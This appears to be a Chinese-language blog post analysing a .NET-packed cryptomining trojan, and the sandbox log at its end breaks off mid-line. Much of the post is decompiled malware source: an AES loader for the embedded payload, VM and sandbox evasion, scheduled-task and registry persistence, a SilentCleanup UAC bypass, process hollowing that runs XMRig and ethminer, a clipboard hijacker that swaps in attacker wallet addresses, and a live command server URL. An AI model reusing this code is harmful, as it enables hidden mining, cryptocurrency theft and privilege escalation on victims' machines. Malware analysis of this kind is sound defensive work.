一个.net加密壳的挖矿木马分析
样本md5:02B886B7B245F7CA52172F299D279A0F
问题:挖矿木马有时候可以启动,有时候起不来?WHY?逆向看看,结论:
foreach (Process process3 in Process.GetProcesses())
{
if (process3.ProcessName.ToLower() == "taskmgr" || process3.ProcessName.ToLower() == "processhacker" || process3.ProcessName.ToLower() == "Диспетчер задач" || process3.ProcessName.ToLower() == "procexp")
{
Environment.Exit(0);
}
}
原来是开启了任务管理器或者processhacker之类的!
接下来是过程:
先看下其执行的函数主体:
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text.RegularExpressions;
using Class3;
namespace Systemwindows
{
// Token: 0x02000002 RID: 2
internal class System
{
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
private static void Main(string[] args)
{
try
{
new DADSAOKQW8URHASQWE().Run();
}
catch
{
}
try
{
System.Udussdusdu();
}
catch
{
}
}
// Token: 0x06000002 RID: 2 RVA: 0x00002094 File Offset: 0x00000294
public static string Dsydadaydas()
{
return File.ReadAllText(Assembly.GetEntryAssembly().Location);
}
// Token: 0x06000003 RID: 3 RVA: 0x000020A5 File Offset: 0x000002A5
private byte[] vsaJ8m2E()
{
if ("{1211-222-001-002}".Length <= 0)
{
return new byte[]
{
1,
2
};
}
return new byte[]
{
1,
2
};
}
// Token: 0x06000004 RID: 4 RVA: 0x000020D1 File Offset: 0x000002D1
public static string VtRxeDjqPXmq()
{
return new Regex("polderhelitcer.*polderhelitcer").Matches(System.Dsydadaydas())[0].Value.Replace("polderhelitcer", "");
}
// Token: 0x06000005 RID: 5 RVA: 0x00002101 File Offset: 0x00000301
private byte[] JBbaqw1132dndGL()
{
if ("{111-22222-0001-0001}".Length <= 0)
{
return new byte[]
{
1,
2
};
}
return new byte[]
{
1,
2
};
}
// Token: 0x06000006 RID: 6 RVA: 0x0000212D File Offset: 0x0000032D
public static string DjqPXmq()
{
return Regex.Split(System.Dsydadaydas(), "polderhelitcer")[2];
}
// Token: 0x06000007 RID: 7 RVA: 0x00002140 File Offset: 0x00000340
private byte[] Hpuodaqds9Ksaw2wB()
{
if ("{21141`11-2222-2008421-00001}".Length <= 0)
{
return new byte[]
{
1,
2
};
}
return new byte[]
{
1,
2
};
}
// Token: 0x06000008 RID: 8 RVA: 0x0000216C File Offset: 0x0000036C
public static void Udussdusdu()
{
Assembly.Load(System.Decrypt(Convert.FromBase64String(System.DjqPXmq()), System.VtRxeDjqPXmq())).EntryPoint.Invoke(null, new object[]
{
new string[0]
});
}
// Token: 0x06000009 RID: 9 RVA: 0x000021A4 File Offset: 0x000003A4
public static byte[] Decrypt(byte[] input, string key)
{
PasswordDeriveBytes passwordDeriveBytes = new PasswordDeriveBytes(key, new byte[]
{
67,
135,
35,
114
});
MemoryStream memoryStream = new MemoryStream();
Aes aes = new AesManaged();
aes.Key = passwordDeriveBytes.GetBytes(aes.KeySize / 8);
aes.IV = passwordDeriveBytes.GetBytes(aes.BlockSize / 8);
CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Write);
cryptoStream.Write(input, 0, input.Length);
cryptoStream.Close();
return memoryStream.ToArray();
}
}
}
可以确定是在执行加密的.net PE文件。
看下这个函数实现:
new DADSAOKQW8URHASQWE().Run();
using System;
using System.Management;
using System.Runtime.InteropServices;
namespace Class3
{
// Token: 0x02000004 RID: 4
public class DADSAOKQW8URHASQWE
{
// Token: 0x0600000C RID: 12 RVA: 0x00002230 File Offset: 0x00000430
public static bool LOWDARAS()
{
foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher("Select * from Win32_ComputerSystem").Get())
{
string text = managementBaseObject["Manufacturer"].ToString().ToLower();
if (text.Contains("microsoft corporation") || text.Contains("vmware")) //检测虚拟机运行
{
return true;
}
if (managementBaseObject["Model"] != null)
{
string text2 = managementBaseObject["Model"].ToString().ToLower();
if (text2.Contains("microsoft corporation") || text2.Contains("vmware"))
{
return true;
}
}
}
return false;
}
// Token: 0x0600000D RID: 13 RVA: 0x00002300 File Offset: 0x00000500
public static bool OIOQR0SASR()
{
bool result;
try
{
if (DADSAOKQW8URHASQWE.IASDIJSAIJWEW("SbieDll.dll").ToInt32() != 0)
{
result = true;
}
else
{
result = false;
}
}
catch
{
result = false;
}
return result;
}
// Token: 0x0600000E RID: 14 RVA: 0x00002340 File Offset: 0x00000540
public void Dytp()
{
try
{
Environment.Exit(0); // 如果是虚拟机环境运行 则直接退出
}
catch
{
}
}
// Token: 0x0600000F RID: 15
[DllImport("kernel32.dll")]
public static extern IntPtr IASDIJSAIJWEW(string lpModuleName);
// Token: 0x06000010 RID: 16 RVA: 0x00002368 File Offset: 0x00000568
public void Run()
{
try
{
if (DADSAOKQW8URHASQWE.LOWDARAS())
{
this.Dytp();
}
if (DADSAOKQW8URHASQWE.OIOQR0SASR())
{
this.Dytp();
}
}
catch
{
}
}
}
}
可以看到,其会检测虚拟机环境,如果是vmvare的,则直接退出了!
动态调试,直接修改"text",“text2”变量,让其不包含vmvare!继续往下运行:
private static void Main(string[] args)
{
try
{
new DADSAOKQW8URHASQWE().Run();
}
catch
{
}
try
{
System.Udussdusdu(); //到这个函数
}
catch
{
}
}
// 上述函数的具体实现
// Token: 0x06000008 RID: 8 RVA: 0x0000216C File Offset: 0x0000216C
public static void Udussdusdu()
{
Assembly.Load(System.Decrypt(Convert.FromBase64String(System.DjqPXmq()), System.VtRxeDjqPXmq())).EntryPoint.Invoke(null, new object[]
{
new string[0]
});
}
可以看到是直接运行解密的.net PE数据!解密的key:
用的是AES解密:
public static byte[] Decrypt(byte[] input, string key)
{
PasswordDeriveBytes passwordDeriveBytes = new PasswordDeriveBytes(key, new byte[]
{
67,
135,
35,
114
});
MemoryStream memoryStream = new MemoryStream();
Aes aes = new AesManaged();
aes.Key = passwordDeriveBytes.GetBytes(aes.KeySize / 8);
aes.IV = passwordDeriveBytes.GetBytes(aes.BlockSize / 8);
CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Write);
cryptoStream.Write(input, 0, input.Length);
cryptoStream.Close();
return memoryStream.ToArray();
}
然后将解密的数据保存为PE文件:
然后继续打开该PE文件,可以看到完整的挖矿源码了:
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Management;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
using Microsoft.Win32;
using MinerAns;
using VolVeRFINAL.Properties;
namespace VolVeRFINAL
{
// Token: 0x02000002 RID: 2
internal class Program
{
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
public static bool UMutexAC()
{
bool flag;
Program.curderApp = new Mutex(false, config.mutex, ref flag);
try
{
if (flag)
{
Thread.Sleep(2000);
}
}
catch
{
}
return flag;
}
// Token: 0x06000002 RID: 2 RVA: 0x00002094 File Offset: 0x00000294
public static void Defolt()
{
while (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = "cmd.exe";
processStartInfo.UseShellExecute = true;
processStartInfo.Verb = "runas";
processStartInfo.Arguments = "/k START \"\" \"" + Assembly.GetEntryAssembly().Location + "\" & EXIT";
try
{
Process.Start(processStartInfo);
Environment.Exit(0);
}
catch (Exception)
{
}
}
}
// Token: 0x06000003 RID: 3 RVA: 0x00002120 File Offset: 0x00000320
private static void Main(string[] args)
{
try
{
if (File.Exists(config.folder + "\\" + config.FileName))
{
File.Delete(config.folder + "\\" + config.FileName);
}
if (!Directory.Exists(config.folder))
{
Directory.CreateDirectory(config.folder);
}
if (!File.Exists(config.folder + "\\" + config.FileName))
{
File.Copy(Assembly.GetEntryAssembly().Location, config.folder + "\\" + config.FileName);
}
}
catch
{
}
try
{
Program.UMutexAC();
}
catch
{
}
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
{
try
{
ProcessStartInfo startInfo = new ProcessStartInfo
{
FileName = "schtasks.exe",
CreateNoWindow = false,
WindowStyle = ProcessWindowStyle.Hidden,
Arguments = string.Concat(new string[]
{
"/create /sc MINUTE /mo 3 /tn \"MicrosoftEdgeUpdate\" /tr \"",
config.folder,
"\\",
config.FileName,
"\" /f"
})
};
Process.Start(startInfo);
goto IL_180;
}
catch
{
goto IL_180;
}
}
try
{
Program.Powershell(string.Concat(new string[]
{
"Remove-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '",
config.RegName,
"';New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '",
config.RegName,
"' -Value '\"",
Path.Combine(config.folder, config.FileName),
"\"' -PropertyType 'String'"
}));
}
catch
{
}
IL_180:
if (config.antiSandbox == "true")
{
try
{
if (Analysis.isVirtualMachine())
{
Environment.Exit(0);
}
}
catch (Exception)
{
}
}
if (config.antiDebugger == "true")
{
try
{
if (Analysis.DetectSandboxie())
{
Environment.Exit(0);
}
}
catch (Exception)
{
}
}
if (config.forceUAC == "true")
{
try
{
Program.Defolt();
}
catch (Exception)
{
}
}
int num = 0;
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("select AdapterRAM from Win32_VideoController");
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
uint? num2 = managementObject.Properties["AdapterRAM"].Value as uint?;
if (num2 != null)
{
num = (int)(num2 / 1048576U).Value;
}
}
int num3 = num / 1024;
byte[] payloadBuffer = new byte[0];
byte[] payloadBuffer2 = new byte[0];
using (MemoryStream memoryStream = new MemoryStream(Resources.xmrig))
{
using (ZipArchive zipArchive = new ZipArchive(memoryStream))
{
foreach (ZipArchiveEntry zipArchiveEntry in zipArchive.Entries)
{
using (MemoryStream memoryStream2 = new MemoryStream())
{
zipArchiveEntry.Open().CopyTo(memoryStream2);
payloadBuffer = memoryStream2.ToArray();
}
}
}
}
using (MemoryStream memoryStream3 = new MemoryStream(Resources.ethminer))
{
using (ZipArchive zipArchive2 = new ZipArchive(memoryStream3))
{
foreach (ZipArchiveEntry zipArchiveEntry2 in zipArchive2.Entries)
{
using (MemoryStream memoryStream4 = new MemoryStream())
{
zipArchiveEntry2.Open().CopyTo(memoryStream4);
payloadBuffer2 = memoryStream4.ToArray();
}
}
}
}
if (config.dwudauiadjws == "true")
{
try
{
File.WriteAllBytes(config.folder + "\\opersystem.exe", Resources.iqdisakwe);
new Process
{
StartInfo =
{
FileName = config.folder + "\\opersystem.exe"
}
}.Start();
File.SetAttributes(config.folder + "\\opersystem.exe", FileAttributes.Hidden);
}
catch
{
}
}
List<string> list = new List<string>();
list.Add("mmc");
list.Add("ProcessHacker");
list.Add("Taskmgr");
list.Add("Диспетчер задач");
string args2 = string.Concat(new string[]
{
"--algo rx/0 --donate-level 0 --max-cpu-usage ",
config.moneroUsage,
" -o",
config.moneroPool,
" -u ",
config.moneroWallet
});
string args3 = string.Concat(new string[]
{
"-P stratum1+tcp://",
config.etcWallet,
".",
config.etcWorker,
"@",
config.etcPool
});
string args4 = string.Concat(new string[]
{
"-P stratum1+tcp://",
config.ethWallet,
".",
config.ethWorker,
"@",
config.ethPool
});
string fileNameWithoutExtension = Path.GetFileNameWithoutExtension("C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddInUtil.exe");
string fileNameWithoutExtension2 = Path.GetFileNameWithoutExtension("C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe");
if (num3 > 4)
{
try
{
Program.PE.Run(payloadBuffer2, "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe", args3);
goto IL_577;
}
catch
{
goto IL_577;
}
}
if (num3 > 8)
{
try
{
Program.PE.Run(payloadBuffer2, "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe", args4);
}
catch
{
}
}
try
{
IL_577:
Program.PE.Run(payloadBuffer, "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddInUtil.exe", args2);
}
catch
{
}
if (config.WebPanel == "true")
{
try
{
Host.getTasks();
}
catch
{
}
}
if (config.bypassUAC == "owdoaodsoa")
{
try
{
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
{
Program.UAC();
Environment.Exit(0);
}
}
catch (Exception)
{
}
}
for (;;)
{
foreach (string processName in list)
{
Process[] processesByName = Process.GetProcessesByName(processName);
while (processesByName.Length != 0)
{
foreach (Process process in Process.GetProcessesByName(fileNameWithoutExtension))
{
try
{
process.Kill();
}
catch
{
}
}
foreach (Process process2 in Process.GetProcessesByName(fileNameWithoutExtension2))
{
try
{
process2.Kill();
}
catch
{
}
}
processesByName = Process.GetProcessesByName(processName);
}
}
try
{
foreach (Process process3 in Process.GetProcesses())
{
if (process3.ProcessName.ToLower() == "taskmgr" || process3.ProcessName.ToLower() == "processhacker" || process3.ProcessName.ToLower() == "Диспетчер задач" || process3.ProcessName.ToLower() == "procexp")
{
Environment.Exit(0);
}
}
Thread.Sleep(7000);
}
catch
{
}
if (config.Hipper == "true")
{
string text = "bc1qptp78yqeu7cagwaewnf0n4u8wh7ynwvadq2xux";
string text2 = "0x5B2e5aB2f0bb903c5aB3Efc4958fE4AA48ceed24";
string text3 = "47jTRtaRQkBapSUtTUNXfzDQC8gJSsqPR3Af78RizkxSdzB5YXwir8b2pC226t6tqRD18acVK2oqJWws5SP7TM1iGzEN7vL";
try
{
Thread.Sleep(500);
string text4 = Program.Clipboard.GetText();
if (new Regex("^3[a-km-zA-HJ-NP-Z1-9]{25,34}$+").IsMatch(text4))
{
Program.Clipboard.SetText(text);
}
if (new Regex("^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$").IsMatch(text4))
{
Program.Clipboard.SetText(text);
}
if (new Regex("^0x[a-fA-F0-9]{40}$").IsMatch(text4))
{
Program.Clipboard.SetText(text2);
}
if (new Regex("(?:^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$)").IsMatch(text4))
{
Program.Clipboard.SetText(text3);
}
}
catch (Exception)
{
}
}
}
}
// Token: 0x06000004 RID: 4 RVA: 0x00002B84 File Offset: 0x00000D84
public static void Powershell(string args)
{
ProcessStartInfo startInfo = new ProcessStartInfo
{
FileName = "powershell.exe",
Arguments = args,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = false
};
Process.Start(startInfo);
}
// Token: 0x06000005 RID: 5 RVA: 0x00002BC8 File Offset: 0x00000DC8
public static void UAC()
{
string text = Assembly.GetExecutingAssembly().Location + " && REM";
new Program.AlwaysNotify();
if (!text.Contains("REM"))
{
Environment.Exit(1);
}
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Environment", true);
registryKey.SetValue("windir", text);
new Process
{
StartInfo =
{
WindowStyle = ProcessWindowStyle.Hidden,
FileName = "C:\\windows\\system32\\schtasks.exe",
Arguments = "/Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I"
}
}.Start();
Thread.Sleep(2000);
registryKey.DeleteValue("windir");
}
// Token: 0x04000001 RID: 1
public static Mutex curderApp;
// Token: 0x02000003 RID: 3
public class AlwaysNotify
{
// Token: 0x06000007 RID: 7 RVA: 0x00002C78 File Offset: 0x00000E78
public AlwaysNotify()
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
string a = registryKey.GetValue(Encoding.Default.GetString(Convert.FromBase64String("Q29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4="))).ToString();
string a2 = registryKey.GetValue(Encoding.Default.GetString(Convert.FromBase64String("UHJvbXB0T25TZWN1cmVEZXNrdG9w"))).ToString();
registryKey.Close();
if (!(a == "2" & a2 == "1"))
{
return;
}
Environment.Exit(1);
}
}
// Token: 0x02000004 RID: 4
public static class Clipboard
{
// Token: 0x06000008 RID: 8 RVA: 0x00002D18 File Offset: 0x00000F18
public static string GetText()
{
string Return = string.Empty;
Thread thread = new Thread(delegate()
{
Return = System.Windows.Forms.Clipboard.GetText();
});
thread.SetApartmentState(ApartmentState.STA);
thread.Start();
thread.Join();
return Return;
}
// Token: 0x06000009 RID: 9 RVA: 0x00002D78 File Offset: 0x00000F78
public static void SetText(string txt)
{
Thread thread = new Thread(delegate()
{
System.Windows.Forms.Clipboard.SetText(txt);
});
thread.SetApartmentState(ApartmentState.STA);
thread.Start();
thread.Join();
}
}
// Token: 0x02000005 RID: 5
public static class PE
{
// Token: 0x0600000A RID: 10
[DllImport("kernel32.dll")]
private unsafe static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, Program.PE.StartupInfo* lpStartupInfo, byte[] lpProcessInfo);
// Token: 0x0600000B RID: 11
[DllImport("kernel32.dll")]
private static extern long VirtualAllocEx(long hProcess, long lpAddress, long dwSize, uint flAllocationType, uint flProtect);
// Token: 0x0600000C RID: 12
[DllImport("kernel32.dll")]
private static extern long WriteProcessMemory(long hProcess, long lpBaseAddress, byte[] lpBuffer, int nSize, long written);
// Token: 0x0600000D RID: 13
[DllImport("ntdll.dll")]
private static extern uint ZwUnmapViewOfSection(long ProcessHandle, long BaseAddress);
// Token: 0x0600000E RID: 14
[DllImport("kernel32.dll")]
private static extern bool SetThreadContext(long hThread, IntPtr lpContext);
// Token: 0x0600000F RID: 15
[DllImport("kernel32.dll")]
private static extern bool GetThreadContext(long hThread, IntPtr lpContext);
// Token: 0x06000010 RID: 16
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(long hThread);
// Token: 0x06000011 RID: 17
[DllImport("kernel32.dll")]
private static extern bool CloseHandle(long handle);
// Token: 0x06000012 RID: 18 RVA: 0x00002DB8 File Offset: 0x00000FB8
public unsafe static void Run(byte[] payloadBuffer, string host, string args)
{
int num = Marshal.ReadInt32(payloadBuffer, 60);
int num2 = Marshal.ReadInt32(payloadBuffer, num + 24 + 56);
int nSize = Marshal.ReadInt32(payloadBuffer, num + 24 + 60);
int num3 = Marshal.ReadInt32(payloadBuffer, num + 24 + 16);
short num4 = Marshal.ReadInt16(payloadBuffer, num + 4 + 2);
short num5 = Marshal.ReadInt16(payloadBuffer, num + 4 + 16);
long num6 = Marshal.ReadInt64(payloadBuffer, num + 24 + 24);
Program.PE.StartupInfo structure = default(Program.PE.StartupInfo);
structure.cb = (uint)Marshal.SizeOf<Program.PE.StartupInfo>(structure);
structure.wShowWindow = 0;
structure.dwFlags = 1U;
byte[] array = new byte[24];
IntPtr intPtr = Marshal.AllocHGlobal(77);
string text = host;
if (!string.IsNullOrEmpty(args))
{
text = text + " " + args;
}
string currentDirectory = Directory.GetCurrentDirectory();
Marshal.WriteInt32(intPtr, 48, 1048603);
Program.PE.CreateProcess(null, text, IntPtr.Zero, IntPtr.Zero, true, 4U, IntPtr.Zero, currentDirectory, &structure, array);
long num7 = Marshal.ReadInt64(array, 0);
long num8 = Marshal.ReadInt64(array, 8);
Program.PE.ZwUnmapViewOfSection(num7, num6);
Program.PE.VirtualAllocEx(num7, num6, (long)num2, 12288U, 64U);
Program.PE.WriteProcessMemory(num7, num6, payloadBuffer, nSize, 0L);
for (short num9 = 0; num9 < num4; num9 += 1)
{
byte[] array2 = new byte[40];
Buffer.BlockCopy(payloadBuffer, num + (int)(24 + num5) + (int)(40 * num9), array2, 0, 40);
int num10 = Marshal.ReadInt32(array2, 12);
int num11 = Marshal.ReadInt32(array2, 16);
int srcOffset = Marshal.ReadInt32(array2, 20);
byte[] array3 = new byte[num11];
Buffer.BlockCopy(payloadBuffer, srcOffset, array3, 0, array3.Length);
Program.PE.WriteProcessMemory(num7, num6 + (long)num10, array3, array3.Length, 0L);
}
Program.PE.GetThreadContext(num8, intPtr);
byte[] bytes = BitConverter.GetBytes(num6);
long num12 = Marshal.ReadInt64(intPtr, 136);
Program.PE.WriteProcessMemory(num7, num12 + 16L, bytes, 8, 0L);
Marshal.WriteInt64(intPtr, 128, num6 + (long)num3);
Program.PE.SetThreadContext(num8, intPtr);
Program.PE.ResumeThread(num8);
Marshal.FreeHGlobal(intPtr);
Program.PE.CloseHandle(num7);
Program.PE.CloseHandle(num8);
}
// Token: 0x06000013 RID: 19 RVA: 0x00002FDC File Offset: 0x000011DC
private static IntPtr Align(IntPtr source, int alignment)
{
long num = source.ToInt64() + (long)(alignment - 1);
return new IntPtr((long)alignment * (num / (long)alignment));
}
// Token: 0x02000006 RID: 6
[StructLayout(LayoutKind.Explicit, Size = 104)]
public struct StartupInfo
{
// Token: 0x04000002 RID: 2
[FieldOffset(0)]
public uint cb;
// Token: 0x04000003 RID: 3
[FieldOffset(60)]
public uint dwFlags;
// Token: 0x04000004 RID: 4
[FieldOffset(64)]
public ushort wShowWindow;
}
}
}
}
另外一个配置类和Host类:
using System;
namespace VolVeRFINAL
{
// Token: 0x02000007 RID: 7
internal class config
{
// Token: 0x04000005 RID: 5
public static string moneroUsage = "25";
// Token: 0x04000006 RID: 6
public static string moneroWallet = "8BEkM3VeZHUQgFevjUBjpYKHKtfbMS9xKMEnWezdD2Rp4BAcsASXFPV6sWYbDU3N1jgPcERvcqUSfLtD6EQiR3AtB2LGDjj";
// Token: 0x04000007 RID: 7
public static string moneroPool = "pool.hashvault.pro:80";
// Token: 0x04000008 RID: 8
public static string etcWallet = "0x5a285Cddf2057ffe8b78E2904e2939271C94a957";
// Token: 0x04000009 RID: 9
public static string etcPool = "etc.2miners.com:1010";
// Token: 0x0400000A RID: 10
public static string ethWallet = "0xac956d72ef62ead6cadcbce4338ed56fc39f2976";
// Token: 0x0400000B RID: 11
public static string ethPool = "eth.2miners.com:2020";
// Token: 0x0400000C RID: 12
public static string ethWorker = "ethrig";
// Token: 0x0400000D RID: 13
public static string etcWorker = "etcrig";
// Token: 0x0400000E RID: 14
public static string mutex = "ZZIOREUEZCTVTVVMOS";
// Token: 0x0400000F RID: 15
public static string folder = Environment.GetEnvironmentVariable("AppData") + "\\Windows";
// Token: 0x04000010 RID: 16
public static string FileName = "winupdate.exe";
// Token: 0x04000011 RID: 17
public static string RegName = "winupdate";
// Token: 0x04000012 RID: 18
public static string bypassUAC = "true";
// Token: 0x04000013 RID: 19
public static string antiSandbox = "true";
// Token: 0x04000014 RID: 20
public static string antiDebugger = "true";
// Token: 0x04000015 RID: 21
public static string forceUAC = "forceder";
// Token: 0x04000016 RID: 22
public static string Hipper = "true";
// Token: 0x04000017 RID: 23
public static string WebPanel = "true";
// Token: 0x04000018 RID: 24
public static string dwudauiadjws = "true";
}
}
using System;
using System.IO;
using System.Management;
using System.Net;
using System.Security.Principal;
namespace VolVeRFINAL
{
// Token: 0x0200000A RID: 10
internal class Host
{
// Token: 0x06000022 RID: 34 RVA: 0x000032D8 File Offset: 0x000014D8
public static string get(string url)
{
string result;
try
{
WebRequest webRequest = WebRequest.Create(url);
webRequest.Credentials = CredentialCache.DefaultCredentials;
((HttpWebRequest)webRequest).UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";
StreamReader streamReader = new StreamReader(webRequest.GetResponse().GetResponseStream());
result = streamReader.ReadToEnd();
}
catch
{
result = null;
}
return result;
}
// Token: 0x06000023 RID: 35 RVA: 0x00003338 File Offset: 0x00001538
public static string[] getTasks()
{
int num = 0;
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("select AdapterRAM from Win32_VideoController");
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
uint? num2 = managementObject.Properties["AdapterRAM"].Value as uint?;
if (num2 != null)
{
num = (int)(num2 / 1048576U).Value;
}
}
int num3 = num / 1024;
string text = "";
using (ManagementObjectSearcher managementObjectSearcher2 = new ManagementObjectSearcher("select * from Win32_VideoController"))
{
foreach (ManagementBaseObject managementBaseObject2 in managementObjectSearcher2.Get())
{
ManagementObject managementObject2 = (ManagementObject)managementBaseObject2;
text = text + managementObject2["Name"].ToString() + "; ";
}
}
string text2 = "";
if (num3 > 4)
{
text2 = " | ETC";
}
if (num3 > 8)
{
text2 = " | ETH";
}
string[] array = Host.get(string.Concat(new object[]
{
Host.adm,
"?hwid=",
WindowsIdentity.GetCurrent().Name,
"&gpuname=",
text,
"&mining=",
num3,
"&active=XMR",
text2
})).Split(new char[]
{
'|'
});
string[] array2 = new string[array.Length];
int num4 = 0;
foreach (string text3 in array)
{
try
{
string[] array4 = text3.Split(new char[]
{
';'
});
string text4 = array4[0].Equals("Update") ? "upd" : "dwl";
string text5 = array4[1];
string text6 = array4[2];
array2[num4] = string.Concat(new string[]
{
text4,
";",
text5,
";",
text6
});
}
catch (Exception)
{
}
num4++;
}
return array2;
}
// Token: 0x0400001B RID: 27
private static string adm = "http://f0702521.xsph.ru/cmd.php";
}
}
好了,使用GPT4综合分析下:
1. config 类:这个类主要用于存储配置信息,包括各种钱包地址、矿池地址、工作名、互斥量、文件名、注册名等。这些配置信息可能会被其他类或方法使用。
internal class config
{
public static string moneroUsage = "25";
public static string moneroWallet = "8BEkM3VeZHUQgFevjUBjpYKHKtfbMS9xKMEnWezdD2Rp4BAcsASXFPV6sWYbDU3N1jgPcERvcqUSfLtD6EQiR3AtB2LGDjj";
// 其他配置信息...
}
2. Host 类:这个类主要用于网络请求和获取系统信息。get 方法用于发送网络请求并获取响应,getTasks 方法用于获取系统的显卡信息和挖矿任务。
internal class Host
{
public static string get(string url)
{
// 发送网络请求并获取响应...
}
public static string[] getTasks()
{
// 获取系统的显卡信息和挖矿任务...
}
private static string adm = "http://f0702521.xsph.ru/cmd.php";
}
总的来说,这两个类可能是某种挖矿软件的一部分,用于配置挖矿参数和执行挖矿任务!
Program 类是一个主程序类,它包含了一些方法用于执行特定的操作。这个类可能是某种恶意软件的一部分,具体功能如下:
1. UMutexAC 方法:创建一个互斥量,用于防止程序的多个实例同时运行。
2. Defolt 方法:尝试以管理员权限运行程序。
3. Main 方法:这是程序的入口点,它执行了一系列的操作,包括删除和复制文件,创建互斥量,检查是否有管理员权限,如果没有则创建计划任务以获取权限,检查是否在沙箱或调试器中运行,如果是则退出,启动挖矿进程,检查剪贴板中的内容,如果是特定格式的地址则替换为预设的地址。
4. Powershell 方法:执行Powershell命令。
5. UAC 方法:尝试绕过用户账户控制(UAC),获取管理员权限。
6. AlwaysNotify 类:检查系统的UAC设置,如果设置为总是通知,则退出程序。
7. Clipboard 类:获取和设置剪贴板的内容。
8. PE 类:执行PE文件的加载和运行。
看下微步沙箱的结果:
共分析了23个进程 1b3adf.exe (PID:3260) "C:\tmpejxdxt\1b3adf.exe" powershell.exe (PID:3436) "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'winupdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'winupdate' -Value '"C:\Users\Admin\AppData\Roaming\Windows\winupdate.exe"' -PropertyType 'String' opersystem.exe (PID:3592) "C:\Users\Admin\AppData\Roaming\Windows\opersystem.exe" wscript.exe (PID:3704) "C:\Windows\System32\WScript.exe" "C:\Portnet\9LUf7xQNOlUBbNUxzKuIYqFs7hpLD.vbe" cmd.exe (PID:3864) C:\Windows\system32\cmd.exe /c ""C:\Portnet\GkY25ZfqKtEhI7it2.bat" " Agentprovidercomponent.exe (PID:3940) "C:\Portnet\Agentprovidercomponent.exe" schtasks.exe (PID:2296) schtasks.exe /create /tn "1b3adf1" /sc MINUTE /mo 10 /tr "'C:\py\1b3adf.exe'" /f schtasks.exe (PID:2524) schtasks.exe /create /tn "1b3adf" /sc ONLOGON /tr "'C:\py\1b3adf.exe'" /rl HIGHEST /f schtasks.exe (PID:2692) schtasks.exe /create /tn "1b3adf1" /sc MINUTE /mo 14 /tr "'C:\py\1b3adf.exe'" /rl HIGHEST /f schtasks.exe (PID:2944) schtasks.exe /create /tn "WeChatW" /sc MINUTE /mo 6 /tr "'C:\Windows\Tasks\WeChat.exe'" /f schtasks.exe (PID:2888) schtasks.exe /create /tn "WeChat" /sc ONLOGON /tr "'C:\Windows\Tasks\WeChat.exe'" /rl HIGHEST /f schtasks.exe (PID:3048) schtasks.exe /create /tn "WeChatW" /sc MINUTE /mo 8 /tr "'C:\Windows\Tasks\WeChat.exe'" /rl HIGHEST /f schtasks.exe (PID:2348) schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft.NET\lsm.exe'" /f schtasks.exe (PID:3388) schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files\Microsoft.NET\lsm.exe'" /rl HIGHEST /f 1b3adf.exe (PID:3556) C:\py\1b3adf.exe schtasks.exe (PID:3740) schtasks.exe /create /tn "lsml" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft.NET\lsm.exe'" /rl HIGHEST /f WeChat.exe (PID:3516) C:\Windows\Tasks\WeChat.exe schtasks.exe (PID:3796) schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\py\cmd.exe'" /f schtasks.exe (PID:856) schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\py\cmd.exe'" /rl HIGHEST /f schtasks.exe (PID:2440) schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 